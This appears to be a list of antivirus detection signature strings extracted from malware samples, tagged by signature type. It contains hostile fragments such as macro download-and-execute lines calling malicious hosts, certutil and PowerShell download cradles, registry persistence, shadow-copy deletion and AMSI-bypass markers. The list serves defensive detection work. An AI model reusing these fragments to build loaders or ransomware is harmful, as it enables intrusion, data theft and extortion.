- javascript (PEHSTR_EXT)
- \Run\ (PEHSTR_EXT)
- window.showMod (PEHSTR_EXT)
- "window.open=null; (PEHSTR_EXT)
- clickstory.co.kr/? (PEHSTR_EXT)
- click.linkprice.com/click.php?m= (PEHSTR_EXT)
- javascript: (PEHSTR_EXT)
- %LOIOLA%set ix=user_pref("network.pr (PEHSTR_EXT)
- ping 127.0.0.1 -n 3&del "%s" (PEHSTR_EXT)
- wscript.exe (PEHSTR_EXT)
- %s\ms%d.dll (PEHSTR_EXT)
- .Sandbox (PEHSTR_EXT)
- .FBApi.1 (PEHSTR_EXT)
- .BHO = s 'CrossriderApp00004 (PEHSTR_EXT)
- } = s 'Aqori.com' (PEHSTR_EXT)
- .BHO = s 'CrossriderApp0004 (PEHSTR_EXT)
- txtpasswd.value=pwdekad (PEHSTR_EXT)
- parent.parent.Dummy.getpwd()d (PEHSTR_EXT)
- <script>window.location = "https://www.santandernet (PEHSTR_EXT)
- .document.frmEnviar.txtEka.value=Eka; (PEHSTR_EXT)
- Dllsaintangerc\Release (PEHSTR_EXT)
- 205.234.134.102 (PEHSTR_EXT)
- 1.0.0.0 (PEHSTR_EXT)
- fMenu.AbrePagina(2773);</script> (PEHSTR_EXT)
- checaAltura(){};</script (PEHSTR_EXT)
- echo createobject("wscript.shell").run " (PEHSTR_EXT)
- .bat",0,true >> (PEHSTR_EXT)
- z:\project2012\remotecontrol\winhttpnet\cqgaen\app\installscript\objfre_wxp_x86\i386\InstallScript.pdb (PEHSTR_EXT)
- z:\project2012\remotecontrol\winhttpnet\amcy\app\win7\serviceapp\objfre_wxp_x86\i386\ServiceApp.pdb (PEHSTR_EXT)
- ftptransfer. (PEHSTR_EXT)
- wscript.exe "%sbb.js" (PEHSTR_EXT)
- C:\intel (PEHSTR_EXT)
- clark.ini (PEHSTR_EXT)
- 550 clark.ini (PEHSTR_EXT)
- Global\ (PEHSTR_EXT)
- \Windows\CurrentVersion\Run (PEHSTR_EXT)
- phpMyAdmin/scripts/setup.php (PEHSTR_EXT)
- biz/s.ico (PEHSTR_EXT)
- >nul del %0 /s/q/a/f (PEHSTR_EXT)
- microsoft\windows nt\currentversion\winlogon (PEHSTR_EXT)
- http://%s:%d/%d%s (PEHSTR_EXT)
- http://egopay.ru/num/ (PEHSTR_EXT)
- http://counter.moneyextre.me/addsubscription.php?abon=7 (PEHSTR_EXT)
- \\.\yspy000 (PEHSTR)
- *SYSTEM\CurrentControlSet\Control\SafeBoot\d (PEHSTR)
- SetSecurityDescriptorDacld (PEHSTR)
- Comspec (PEHSTR)
- /c del " (PEHSTR)
- svchost.exe (PEHSTR)
- r_server.exe (PEHSTR)
- *SYSTEM\CurrentControlSet\Services\r_server (PEHSTR)
- /pass: (PEHSTR)
- /port: (PEHSTR)
- SOFTWARE\Borland\Delphi\RTLd (PEHSTR_EXT)
- \\.\mailslot\ (PEHSTR_EXT)
- loplop.ini (PEHSTR_EXT)
- lop_b.sys (PEHSTR_EXT)
- \\.\HxDefDriver (PEHSTR_EXT)
- \\.\mailslot\hxdef-rk100s (PEHSTR_EXT)
- \\.\mailslot\hxdef-rk100s0ACEE761 (PEHSTR_EXT)
- Prefetch\*.pf (PEHSTR_EXT)
- \\.\mailslot\hxdef-rkc (PEHSTR_EXT)
- reg delete "HKEY_CURRENT_USER\Software\Microsoft\Active Setup\Installed Components\ (PEHSTR_EXT)
- \Battle.net\Identity (PEHSTR_EXT)
- \V3Medic.exe (PEHSTR_EXT)
- SOFTWARE\Microsoft\Ole (PEHSTR_EXT)
- V3Medic.exe (PEHSTR_EXT)
- %s\AYLaunch.exe (PEHSTR_EXT)
- %s\usp10.dll.bak (PEHSTR_EXT)
- <description><![CDATA[ (PEHSTR_EXT)
- btnSubscriptionsClick (PEHSTR_EXT)
- onSubscriptionNumberChange (PEHSTR)
- stariffs.rud (PEHSTR_EXT)
- rufile.ind (PEHSTR_EXT)
- realfine.ind (PEHSTR_EXT)
- fastru.ind (PEHSTR_EXT)
- ri ffs .rud (PEHSTR_EXT)
- lapoxol.in (PEHSTR_EXT)
- btnSubscriptionCheckCode (PEHSTR_EXT)
- G-dx70k^,.jb1. (PEHSTR_EXT)
- lSubscriptionStep3 (PEHSTR_EXT)
- btnsubscriptioncheckcode (PEHSTR_EXT)
- lChooseDifferentSubscriptionNumberClick (PEHSTR_EXT)
- btnSubscriptionCheckCodeImgLabel (PEHSTR_EXT)
- %CDATA[flashsetup]]></description><id> (PEHSTR)
- ZipFlash.exe (PEHSTR)
- ff2.vbs (PEHSTR_EXT)
- %%\wscript.exe (PEHSTR_EXT)
- \ff2.vbs (PEHSTR_EXT)
- firefox2.vbs (PEHSTR_EXT)
- \firefox2.vbs (PEHSTR_EXT)
- CHARGEMENT. (PEHSTR_EXT)
- (BE|KB)\.tmp\.(exe|[0-9]{1,2}\.exe)d (PEHSTR_EXT)
- |temp~manager\.exe|ServicesStarter\.exe$2 (PEHSTR_EXT)
- A_UserName,"drwebstatic.hopto.org2 (PEHSTR_EXT)
- delete, %startup%\Secure Web.lnk2 (PEHSTR_EXT)
- a_scriptname != "temp~manager.exe" (PEHSTR_EXT)
- %file_mov_dir%\~DF%nnn%KB.tmp.exe (PEHSTR_EXT)
- %atemp%\~temp~%ayday%~.tmp (PEHSTR_EXT)
- SOFTWARE\Policies\Google\Chrome\ExtensionInstallForcelist, 1, (PEHSTR_EXT)
- -.xml (PEHSTR_EXT)
- SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System, EnableLUA, 0 (PEHSTR_EXT)
- CurrentVersion\Run, (PEHSTR_EXT)
- CurrentVersion\RunOnce, (PEHSTR_EXT)
- b\N+?N (SNID)
- 4\SDe (SNID)
- ?/h~~vx (SNID)
- JsX (SNID)
- ntdll (PEHSTR_EXT)
- avicap32.dll (PEHSTR_EXT)
- cmd.exe / (PEHSTR_EXT)
- ping 127.0.0.1 & del " (PEHSTR_EXT)
- %s\WService.dll (PEHSTR_EXT)
- %s\regsvr32.exe (PEHSTR_EXT)
- @facebook.com.xpi (PEHSTR_EXT)
- ://pubupl.com/updates/ (PEHSTR_EXT)
- sm5r/t0oa/g8llkaie.xml (PEHSTR_EXT)
- "scripts": [ "ante.js", (PEHSTR_EXT)
- "scripts": [ "supprimer.js", (PEHSTR_EXT)
- capGetDriverDescriptionA (PEHSTR_EXT)
- mode=2&done=1&cmdid= (PEHSTR_EXT)
- try {jwplayer().play()} (PEHSTR_EXT)
- '>click</a> (PEHSTR_EXT)
- .Run(" (PEHSTR_EXT)
- mshta "javascript: (PEHSTR_EXT)
- =new ActiveXObject("WScript.Shell"); (PEHSTR_EXT)
- scriptable_host": [ "http://*/*" ] (PEHSTR_EXT)
- //Google//Chrome//User Data//Default//Preferences (PEHSTR_EXT)
- chrome.exe (PEHSTR_EXT)
- opera.exe (PEHSTR_EXT)
- \winregist.er (PEHSTR_EXT)
- ServiceDll (PEHSTR)
- %s\%sex.dll (PEHSTR)
- ,%SystemRoot%\System32\svchost.exe -k netsvcs (PEHSTR)
- SetSecurityDescriptorControl (PEHSTR)
- 4SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost (PEHSTR)
- ^S\P^Z (MACRO_SOURCE)
- Z'Y`/ (MACRO_SOURCE)
- 80.242.123.155/" (MACROHSTR_EXT)
- exe/ (MACROHSTR_EXT)
- http://46.30.43.146/909.jpg (MACROHSTR_EXT)
- 034f43+buhu5.ru/ (MACROHSTR_EXT)
- http://thewelltakeberlin.com/92.exe (MACROHSTR_EXT)
- nzzv://suxkroqkyzujge.ius/ulloik.kdk (MACROHSTR_EXT)
- + "46.30.41" + ".150/" + "bb.ty" + "p" (MACROHSTR_EXT)
- Shell (qau.aoi.Text & wpvmbiudhmceufab) (MACROHSTR_EXT)
- https://ads-letter.info/client_script.js (MACROHSTR_EXT)
- twm1qP5X34eq.Open "poST", bt9tzD.J3jEet1U5 (MACROHSTR_EXT)
- yos/mtcpp.i.tiwcdtow/nhew1ieg/.mm//2x/m:va (MACROHSTR_EXT)
- beesteriphudilulunpecharakkees\pm.j\\:sptth (MACROHSTR_EXT)
- Call VBA.Shell( (MACROHSTR_EXT)
- "dolphin2000.ir/tmp/" (MACROHSTR_EXT)
- "gnf.jotpee.de/tmp/" (MACROHSTR_EXT)
- .Open "GET", (MACROHSTR_EXT)
- http://darkbreak.webcindario.com/update/myapp.zip (MACROHSTR_EXT)
- StrReverse("e.tsohnvs\pmeT\lacoL\%ATADPPA%") & "xe (MACROHSTR_EXT)
- cleen.bat (PEHSTR_EXT)
- .two@AUSI.COM (PEHSTR_EXT)
- .docx (PEHSTR_EXT)
- africa.bmp (PEHSTR_EXT)
- .jpeg (PEHSTR_EXT)
- /close/script.php (PEHSTR_EXT)
- .com/open/script.php (PEHSTR_EXT)
- \Microsoft\PlayReady\Fidmdtpy\Jdoauytbiw (FOLDERNAME)
- \Microsoft\PlayReadySilverlight\Myfmidc\Fgydngcbxcs (FOLDERNAME)
- 7Js (SNID)
- 7(\#h+ (SNID)
- ~9?,\y/` (SNID)
- mS .j (SNID)
- Vt/vo (SNID)
- ~z.#Q (SNID)
- {sE.m} (SNID)
- =httpu (PEHSTR_EXT)
- JavaScript (PEHSTR_EXT)
- Communicate (PEHSTR_EXT)
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication (PEHSTR_EXT)
- rundll32.exe vbscript:"\..\mshtml,RunHTMLApplication (PEHSTR_EXT)
- 8)Cs\ (MACRO_SOURCE)
- /7rvmnb (MACROHSTR_EXT)
- (/af/7rvmnb (MACROHSTR_EXT)
- (/7rvmnb (MACROHSTR_EXT)
- uggc://nyhpneqban.pbz/wf/ova.rkr (MACROHSTR_EXT)
- \qfUUU.rkr (MACROHSTR_EXT)
- oPlKtRebGf = oGdyeJdhsdd.TextBox4 + iuyhgdfsdf + hyyuejkjs + yyeidsadf + yeuijjffsa (MACROHSTR_EXT)
- WScript.Shell (MACROHSTR_EXT)
- PHT = "" & "ht" & "t" & "p://" & "" (MACROHSTR_EXT)
- SPIC = "" & "s" & "av" & "epi" + "c.su" + "/" (MACROHSTR_EXT)
- LNSS = "lns.txt" (MACROHSTR_EXT)
- objProcess.Create "power" & "shell" & ".exe -ExecutionPolicy Bypass -WindowStyle Hidden -noprofile -noexit (MACROHSTR_EXT)
- fspresentationproducts.com/ (MACROHSTR_EXT)
- "chameleonpaintworks.com/w" + "p-con" + "tent/pl" + "ugins/w" + "p-jqu" + "ery-lig" + "htbox/sty" + "les/imag" + "es/he_IL/" (MACROHSTR_EXT)
- "www.in" + "caltaminte.in" + "fo/w" + "p-content/upl" + "oads/201" + "5/0" + "6/" (MACROHSTR_EXT)
- "www.iscmo" + "ntegranaro.it/w" + "p-content/upl" + "oads/201" + "5/0" + "6/" (MACROHSTR_EXT)
- _1.Open (MACROHSTR_EXT)
- "mistatuajes.com.es/w" + "p-co" + "ntent/plu" + "gins/wor" + "dp" + "ress-seo/v" + "endor/yo" + "ast/lic" + "ense-man" + "ager/sa" + "mples/" (MACROHSTR_EXT)
- "misfrutales.com.es/w" + "p-co" + "nten" + "t/p" + "lugin" + "s/nin" + "ja-pop" + "ups/adm" + "in/cs" + "s/jqu" + "ery-ui-ari" + "sto/ima" + "ges/" (MACROHSTR_EXT)
- gitos." (PEHSTR_EXT)
- =type="password" class="campo" size="6" maxlength="6" /> (PEHSTR_EXT)
- javascript:acessaPagina("seleciona_investimento.processa") (PEHSTR_EXT)
- SCREENSHOT (PEHSTR_EXT)
- /pki/mscorp/crl/MSIT (PEHSTR_EXT)
- /script?u= (PEHSTR_EXT)
- .zapto.org: (MACROHSTR_EXT)
- .ResponseBody (MACROHSTR_EXT)
- .SaveToFile ("C:\Windows\Temp\ (MACROHSTR_EXT)
- "\warant.exe" (MACROHSTR_EXT)
- = VBA.CreateObject("WScript.Shell") (MACROHSTR_EXT)
- .Language = "jscript" (MACROHSTR_EXT)
- </name> (PEHSTR_EXT)
- <em:description>Quick Searcher (PEHSTR_EXT)
- </em:description> (PEHSTR_EXT)
- 127.0.0.1 clients2.google.com (PEHSTR_EXT)
- \signal.dat (PEHSTR_EXT)
- \Yandex\YandexBrowser\User Data\Default\ (PEHSTR_EXT)
- \Amigo\User Data\Default\Extension Data (PEHSTR_EXT)
- \Opera Software\Opera Stable\Preferences (PEHSTR_EXT)
- AvastSvc.exe (PEHSTR_EXT)
- avgrsx.exe (PEHSTR_EXT)
- \x37","\x38","\x39","\x30","\x68\x74\x74\x70\x73\x3A\x2F\x2F\x77\x77\x77\x2E\x6C\x6F\x73\x61\x6E\x67\x6F\x6E\x65\x74\x2E\x63\x6F\x6D\x2E\x62\x72\x2F\x43\x6F\x6D\x6D\x6F\x6E\x73\x2F\x61\x73\x70\x2F\x42\x61\x72\x63\x6F\x64\x65 (PEHSTR_EXT)
- =["\x (PEHSTR_EXT)
- createobject("wscript.shell")>>"%userprofile%\run.vbs" (PEHSTR_EXT)
- echo objshell.run "%temp%\run.bat",vbhide>> (PEHSTR_EXT)
- Lib "shell32.dll" Alias (MACROHSTR_EXT)
- "ShellExecuteA" (ByVal (MACROHSTR_EXT)
- ("fyf/ (MACROHSTR_EXT)
- Shell "mshta javascript:""\..\mshtml,RunHTMLApplication "";GetObject(""script:http:/" + Replace(abadondend, (MACROHSTR_EXT)
- Shell "mshta javascript:""\..\mshtml,RunHTMLApplication "";GetObject(""script:http: (MACROHSTR_EXT)
- host_scripts (PEHSTR_EXT)
- href\s*=\s*(?:["'](?<1>[^"']*)["']|(?<1>\S+)) (PEHSTR_EXT)
- ^(?:[0-9]{1,3}\.){3}[0-9]{1,3}$ (PEHSTR_EXT)
- javascript:for(var C=0;C<q_aUinList.length;C++){var D=q_aUinList[C];document.write(D.uin+","+D.key+"[ (PEHSTR_EXT)
- xui.ptlogin2.qq.com/cgi-bin/qlogin?domain=qq.com&lang=2052&qtarget=0&jumpname=&ptcss=&param=u1 (PEHSTR_EXT)
- xnote.cn/api/note/save/ (PEHSTR_EXT)
- blog.gentilkiwi.com/mimikatz (PEHSTR)
- kelloworld.dll (PEHSTR)
- powerkatz.dll (PEHSTR_EXT)
- getDescription (PEHSTR_EXT)
- \Projets\vbsedit_source\script2exe\Release\mywscript.pdb (PEHSTR_EXT)
- g.disgogoweb.com/ (PEHSTR_EXT)
- taskkill /f /im msiexev.exe (PEHSTR_EXT)
- scripts\miner.lua (PEHSTR_EXT)
- \svchost\obj\Debug\svchost.pdb (PEHSTR_EXT)
- System.dll (PEHSTR_EXT)
- \System.dll (PEHSTR_EXT)
- sportswoman.dll (PEHSTR_EXT)
- ConscriptProtozoanBedfellow (PEHSTR_EXT)
- ThisDocument. (MACROHSTR_EXT)
- Err.Description (MACROHSTR_EXT)
- Err.Raise Number:=1 (MACROHSTR_EXT)
- .cscript //nologo c:\windows\system32\slmgr.vbs (PEHSTR)
- If Application.RecentFiles.Count < 3 Then Module1. (MACROHSTR_EXT)
- Err.Raise Number:=4, Description:=s( (MACROHSTR_EXT)
- ZMwb.Open(s("TEG", 17, 23), (MACROHSTR_EXT)
- cOuh = ZMwb.ResponseText (MACROHSTR_EXT)
- Esfile = Environ("TEMP") & "\ (MACROHSTR_EXT)
- htajs" (MACROHSTR_EXT)
- Dfile = ThisWorkbook.Path & "\ (MACROHSTR_EXT)
- p.xls" (MACROHSTR_EXT)
- Dfile = Environ("TEMP") & "\ (MACROHSTR_EXT)
- Shell "cscript /E:vbscript """ & Jsfile & """", vbHide (MACROHSTR_EXT)
- File description (PEHSTR_EXT)
- gateway.php (PEHSTR_EXT)
- CreateObject("Scripting.FileSystemObject (MACROHSTR_EXT)
- .CreateTextFile(js, True) (MACROHSTR_EXT)
- Shell "wscript (MACROHSTR_EXT)
- ikabaddi.in (MACROHSTR_EXT)
- lybybirdie. (MACROHSTR_EXT)
- ch.navit (MACROHSTR_EXT)
- elia.com carsg (MACROHSTR_EXT)
- ames.org (MACROHSTR_EXT)
- && start wscript //B //E:JScript (PEHSTR_EXT)
- %c%c%c%c%c%c.exe (PEHSTR_EXT)
- /c @ping -n 5 127.0.0.1&del (PEHSTR_EXT)
- Yow! Bad host lookup. (PEHSTR_EXT)
- SYSTEM\CurrentCont (PEHSTR_EXT)
- rolSet\Services\ (PEHSTR_EXT)
- /test_site_scripts/moduls/traffic/get_info.php (PEHSTR_EXT)
- 45.76.81.110 (PEHSTR_EXT)
- mailsupload.php (PEHSTR_EXT)
- /test_site_scripts/moduls/connects/ (PEHSTR_EXT)
- %s\OfficeTab\Favorites (PEHSTR_EXT)
- \ExcelFavorite.acl (PEHSTR_EXT)
- %s\MicroSoftWare (PEHSTR_EXT)
- %s\1FAAXB2.tmp (PEHSTR_EXT)
- %s\%s.HTML (PEHSTR_EXT)
- %s\%s.TXT (PEHSTR_EXT)
- %s\Stop Ransomware Decrypts Tools.exe (PEHSTR_EXT)
- %s\MicroSoftWare\SmartScreen\%s.exe (PEHSTR_EXT)
- momory could not be read. (PEHSTR_EXT)
- Windows SmartScreen Updater (PEHSTR_EXT)
- /To buy the decryptor, you must pay the cost of: (PEHSTR)
- hmshta.exe "javascript:o=new ActiveXObject('WScript.Shell');setInterval(function(){try{o.RegWrite('HKCU\\ (PEHSTR)
- http://adobe.update-service.net/index.php?comp= (PEHSTR_EXT)
- %s%08X%08X%08X%08X.%s (PEHSTR_EXT)
- :\USERDATA\*.* (PEHSTR_EXT)
- ACH.ADB.ADS.AIT.AL.APJ. (PEHSTR_EXT)
- /js/other_scripts/get.php (PEHSTR_EXT)
- %s\Microsofts\Windows NT\%s.exe (PEHSTR_EXT)
- MS Common User Interface (PEHSTR_EXT)
- Virus and spyware definitions couldn't be updated. (PEHSTR_EXT)
- agntsvc.exeisqlplussvc.exe (PEHSTR_EXT)
- p:" + "//" + hammer + "/ (MACROHSTR_EXT)
- .ex" + "e})) (MACROHSTR_EXT)
- = CreateObject("vbscript.regexp") (MACROHSTR_EXT)
- .Global = (MACROHSTR_EXT)
- .Pattern = (MACROHSTR_EXT)
- .Replace( (MACROHSTR_EXT)
- = CreateObject("WScript.Shell") (MACROHSTR_EXT)
- http://bkainline2/fileadmin (MACROHSTR_EXT)
- /scripts/superfish/js/supersubs.php (PEHSTR_EXT)
- 212.47.254.187 (PEHSTR_EXT)
- %s\INSTRUCTION_FOR_HELPING_FILE_RECOVERY.TXT (PEHSTR_EXT)
- bcdedit /set {default} recoveryenabled No (PEHSTR_EXT)
- n<hta:application windowstate="minimize"/><script>new ActiveXObject("WScript.Shell").Run("cmd /c \"\""+window.l (PEHSTR)
- \HELP_%s.html (PEHSTR_EXT)
- process call create "cmd.exe /c vssadmin.exe delete shadows (PEHSTR_EXT)
- PG1ldGEgaHR0cC1lcXVpdj0ncmVmcmVzaCcgY29udGVudD0nMDsgdXJsPWh0dHA6Ly8 (PEHSTR_EXT)
- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDYEYkIZivftqlhZCLdPcGwu4/MAHwbsB965BHJ120L9G1tmynAPpZc (PEHSTR_EXT)
- %02hu.%02hu.%04hu; (PEHSTR_EXT)
- SFX script commands (PEHSTR_EXT)
- miner\ (PEHSTR_EXT)
- .vbs" (PEHSTR_EXT)
- reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run (PEHSTR_EXT)
- MacScript "do shell script ""(curl -s (MACROHSTR_EXT)
- Read("OF") & ".pkg (MACROHSTR_EXT)
- ComputerName") & vbNewLine & Environ("UserDomain (MACROHSTR_EXT)
- schtasks /create /sc MINUTE /tn ""GoogleUpdateTasksMachineCore"" (MACROHSTR_EXT)
- \""sc\""r\""i\""p\""t:http://80.255.3.109/microsoft.js (MACROHSTR_EXT)
- ("HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\CurrentVersion") (MACROHSTR_EXT)
- & "\Windows\System32\wscript.exe", (MACROHSTR_EXT)
- norwaynews.mooo.com (PEHSTR_EXT)
- ebay-global.publicvm.com (PEHSTR_EXT)
- psychology-blog.ezua.com (PEHSTR_EXT)
- /scripts/m/query.php?id= (PEHSTR_EXT)
- cmd.exe /c (PEHSTR_EXT)
- Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36 (PEHSTR_EXT)
- script_code (PEHSTR_EXT)
- script_test.pyt (PEHSTR_EXT)
- inject.bin (PEHSTR_EXT)
- imain.bin (PEHSTR_EXT)
- setting arguments... (PEHSTR_EXT)
- Script has stopped (PEHSTR_EXT)
- Script SUCCESS (PEHSTR_EXT)
- Script FAILED (PEHSTR_EXT)
- script_codet (PEHSTR_EXT)
- console_exe (PEHSTR_EXT)
- CreateObject("Wscript.Shell") (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- .sendkeys"{numlock}" (PEHSTR_EXT)
- .sendkeys"{capslock}" (PEHSTR_EXT)
- .sendkeys"{scrolllock}" (PEHSTR_EXT)
- WScript.sleep (PEHSTR_EXT)
- Server.sfx.exe (PEHSTR_EXT)
- .regwrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run (MACROHSTR_EXT)
- CreateObject("Wscript.Shell") (MACROHSTR_EXT)
- Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3 (PEHSTR_EXT)
- http://212.109.196.67/gateway.php (PEHSTR_EXT)
- "inject": "<script>var home_link = \"https (PEHSTR_EXT)
- \usbddghci (PEHSTR_EXT)
- \UsbgKrnl (PEHSTR_EXT)
- /etc/atmfont.bin (PEHSTR_EXT)
- ktrap.dll (PEHSTR_EXT)
- atmfd.dll (PEHSTR_EXT)
- \LiptonMilkTea (PEHSTR_EXT)
- \Systemroot\system32\drivers\%wZ (PEHSTR_EXT)
- dump_dumpfve.sys (PEHSTR_EXT)
- \NPF-{0179AC45-C226-48e3-A205-DCA79C824051} (PEHSTR_EXT)
- PSSh\@ (PEHSTR_EXT)
- /arksig.js (PEHSTR_EXT)
- /bin/i386/dump.bin (PEHSTR_EXT)
- /bin/i386/kernel.bin (PEHSTR_EXT)
- /bin/i386/kernel.sig (PEHSTR_EXT)
- /boot/boot.cfg (PEHSTR_EXT)
- /boot/kernel (PEHSTR_EXT)
- /etc/crypto.key (PEHSTR_EXT)
- /etc/original.dat (PEHSTR_EXT)
- /setup.img (PEHSTR_EXT)
- = "d /V^:^O (MACROHSTR_EXT)
- /C" + """" + "^s^e^t (MACROHSTR_EXT)
- = "d.exe /c p^O^w^e^R^s^H^e^" + Format(Chr((( (MACROHSTR_EXT)
- //^:" + "^" + "p" + "^t^t" + "h@^" + (MACROHSTR_EXT)
- //^" + ":^p^" + "t^th" (MACROHSTR_EXT)
- = "d /V/C" + """" + "^s^ (MACROHSTR_EXT)
- /" + "/:" + "pt^t" + "^h^ (MACROHSTR_EXT)
- )) + "md /V (MACROHSTR_EXT)
- = "D /c " + """^cm^D; ; ; ^/v:^ON^ ;/^c ""; ; (MACROHSTR_EXT)
- .DownloadString('http://4host.publicvm.com/api/cscript') | PowersHell (MACROHSTR_EXT)
- \..\." + ".\..\win" + "dows\system" + "32\cmd.exe" + " /c %Program" + "Data: (MACROHSTR_EXT)
- + "md /V" + "^:/" + Chr( (MACROHSTR_EXT)
- + CreateObject("Wscript.shell").Run( (MACROHSTR_EXT)
- VBA.Shell "" + (MACROHSTR_EXT)
- system.management.automation.scriptblock (PEHSTR_EXT)
- writescriptblocktolog (PEHSTR_EXT)
- logscriptblockstart (PEHSTR_EXT)
- logscriptblockend (PEHSTR_EXT)
- System.Management.Automation.AmsiUtils (PEHSTR_EXT)
- invisishellprofiler.dll (PEHSTR_EXT)
- InvisiShellProfiler.Dll (PEHSTR_EXT)
- DllGetCl (PEHSTR_EXT)
- & "scripting" & ".filesyst" & "emobject") (MACROHSTR_EXT)
- = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
- = CreateObject("scripting.filesystemobject") (MACROHSTR_EXT)
- (Application.MailSystem) Like (MACROHSTR_EXT)
- .fuck.exe (PEHSTR)
- = jtykpype.GetFolder(agulu.expandEnvironmentStrings("%PROGRAMFILES%")) (MACROHSTR_EXT)
- ssugym = "wscri" & bxeko & "xe " & otkybw & "script " & wolyx (MACROHSTR_EXT)
- = CreateObject("microsoft.xmlhttp") (MACROHSTR_EXT)
- = CreateObject("Shell.Application") (MACROHSTR_EXT)
- .Status = 200 Then (MACROHSTR_EXT)
- = CreateObject("adodb.stream") (MACROHSTR_EXT)
- ~9,2% /V (MACROHSTR_EXT)
- ~9,2% " + "/V: (MACROHSTR_EXT)
- ",2% /V:O" + (MACROHSTR_EXT)
- + "9,2% /V:O" (MACROHSTR_EXT)
- ~9,2% /" + "V (MACROHSTR_EXT)
- "9,2% /V (MACROHSTR_EXT)
- ",2%" + " /V (MACROHSTR_EXT)
- a-zA-Z0-9 +).Run (MACROHSTR_EXT)
- .TextBox1) (MACROHSTR_EXT)
- wscript.shell (MACROHSTR_EXT)
- [runtime.interopservices.marshal].getmembers()[4].name).invoke( [runtime.interopservices.marshal]::securestringtoglqj (MACROHSTR_EXT)
- CreateObject("shell.application") (MACROHSTR_EXT)
- Selection.TypeText ( (MACROHSTR_EXT)
- ActiveDocument.Password = (MACROHSTR_EXT)
- .ShellExecute "cmd.exe", (MACROHSTR_EXT)
- ("ping 127.0.0.1 -n 2",false);}}} (PEHSTR_EXT)
- ()+".txt"; (PEHSTR_EXT)
- .run("certutil -encodehex " (PEHSTR_EXT)
- .Get("Win32_Process") (PEHSTR_EXT)
- 201,stream.Size); (PEHSTR_EXT)
- .open('','_self','') (PEHSTR_EXT)
- +net.ComputerName; (PEHSTR_EXT)
- .Run(cmd,0,!fork);} (PEHSTR_EXT)
- ()+".txt") (PEHSTR_EXT)
- \\..\\..\\..\\mshtml,RunHTMLApplication" (PEHSTR_EXT)
- scrobj.dll";if(fork32Bit) (PEHSTR_EXT)
- rundll32.exe javascript:\"\\..\\mshtml, (PEHSTR_EXT)
- "wmic os get /FORMAT:\ (PEHSTR_EXT)
- =new ActiveXObject("WScrip (PEHSTR_EXT)
- .Run(cmd, (PEHSTR_EXT)
- .UserDomain.length!=0 (PEHSTR_EXT)
- ()+".txt" (PEHSTR_EXT)
- jobkey,work.status== (PEHSTR_EXT)
- ActiveXObject("WScript.Shell"),STAGER:"http (PEHSTR_EXT)
- nuR\noisreVtnerruC\swodniW\tfosorciM\erawtfoS (PEHSTR_EXT)
- C:\Windows\System32\wscript.exe (PEHSTR_EXT)
- script-src 'self' https://www.gstatic.com/ https://accounts.google.com https://*.firebaseio.com https://www.googleapis.com; object-src 'self' (PEHSTR_EXT)
- \firebase-messaging.js (PEHSTR_EXT)
- \firebase-messaging-sw.js (PEHSTR_EXT)
- \Mozilla\Firefox\Profiles\ (PEHSTR_EXT)
- cscript //b //nologo %tmp%/ (PEHSTR_EXT)
- .vbs (PEHSTR_EXT)
- Wscript.Sleep 1000* (PEHSTR_EXT)
- data.dat (PEHSTR_EXT)
- CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName) (PEHSTR_EXT)
- .RegWrite (MACROHSTR_EXT)
- ActiveWindow.View.ShowHiddenText = True (MACROHSTR_EXT)
- = Application.StartupPath + (MACROHSTR_EXT)
- = Shell("wscript.exe """ + (MACROHSTR_EXT)
- 2x%.2x%.2x%.2x%.2x% (PEHSTR_EXT)
- cmd /c %s (PEHSTR_EXT)
- Action.Path = "wmic" (MACROHSTR_EXT)
- Action.Arguments = "PROCESS call create ""wscript.exe /b /e:jscript " & rparam & "\" & lparam & """" (MACROHSTR_EXT)
- bee_je "auto.chk", lPath, "Sysupdate_805" (MACROHSTR_EXT)
- If (shd.Name = "Sh000001") Then (MACROHSTR_EXT)
- & "\msohtml.exe" (MACROHSTR_EXT)
- & " //E:vbscript /b " & (MACROHSTR_EXT)
- & "\msohtml.log" (MACROHSTR_EXT)
- = "HKCU\Software\Classes\CLSID\{" (MACROHSTR_EXT)
- & "}\Shell\Manage\Command\" (MACROHSTR_EXT)
- {0afaced1-e828-11d1-9187-b532f1e9575d}\ (PEHSTR_EXT)
- \target.lnk (PEHSTR_EXT)
- <html><body><script> (PEHSTR_EXT)
- </script></body></html> (PEHSTR_EXT)
- taskkill /im wscript.exe /f (PEHSTR)
- \tao.vbs (PEHSTR)
- \ls.vbs (PEHSTR)
- %Wscript.CreateObject("Wscript.Shell") (PEHSTR)
- WshShell.Run (PEHSTR)
- chromea.exe (PEHSTR)
- chromes.exe (PEHSTR)
- /\CurrentVersion\Policies\Explorer\Run\ADSL Dial (PEHSTR)
- C:\start.cmd (PEHSTR)
- @taskmgr.exe (PEHSTR)
- .RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Updat", "wscript (MACROHSTR_EXT)
- \Silent.vbs", "REG_SZ" (MACROHSTR_EXT)
- costura.commandline.dll.compressed (PEHSTR_EXT)
- costura.heijden.dns.dll.compressed (PEHSTR_EXT)
- get_ComputerSamAccountName (PEHSTR_EXT)
- SetSecurityDescriptorBinaryForm (PEHSTR_EXT)
- mshta.exe javascript:getobject (MACROHSTR_EXT)
- Register-Cimprovider.exe -path c: (MACROHSTR_EXT)
- forfiles /p (MACROHSTR_EXT)
- C:\Windows /m notepad.exe /c (MACROHSTR_EXT)
- C:\Windows\System32\cmd.exe /c replace.exe (MACROHSTR_EXT)
- System32\replace.exe (MACROHSTR_EXT)
- cmd.exe /c certutil.exe -urlcache -split -f (MACROHSTR_EXT)
- msiexec.exe /q /i (MACROHSTR_EXT)
- C:\Windows\System32\Register-CimProvider.exe -path (MACROHSTR_EXT)
- Shell """" + "" + "ms" + "hta""""" + "https" + ":\\ (MACROHSTR_EXT)
- @j.mp\ (MACROHSTR_EXT)
